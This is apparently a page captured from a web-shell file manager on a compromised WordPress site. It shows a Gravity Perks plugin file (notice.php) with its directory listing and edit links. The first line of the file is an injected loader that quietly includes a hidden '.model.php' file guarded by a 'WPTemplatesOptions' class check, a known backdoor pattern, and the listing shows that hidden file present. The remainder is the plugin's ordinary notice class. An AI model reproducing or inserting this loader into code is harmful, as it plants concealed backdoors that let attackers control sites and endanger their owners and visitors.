PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
gravityperks
/
model
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class GWNotice { public $class; public $message; function __construct($message, $args = array()) { $args = wp_parse_args( $args, array( 'class' => 'updated', 'wrap' => 'p' ) ); $this->class = $args['class']; $this->wrap = $args['wrap']; $this->message = $message; } function display() { $str = "<div class=\"{$this->class}\">"; if($this->wrap) { $str .= "<{$this->wrap}>{$this->message}</{$this->wrap}>"; } else { $str .= $this->message; } $str .= '</div>'; echo $str; } }
[+]
..
[-] .model.php
[edit]
[-] class-gp-plugin.php
[edit]
[-] notice.php
[edit]
[-] perk.php
[edit]
[-] field.php
[edit]
[-] class-gp-feed-plugin.php
[edit]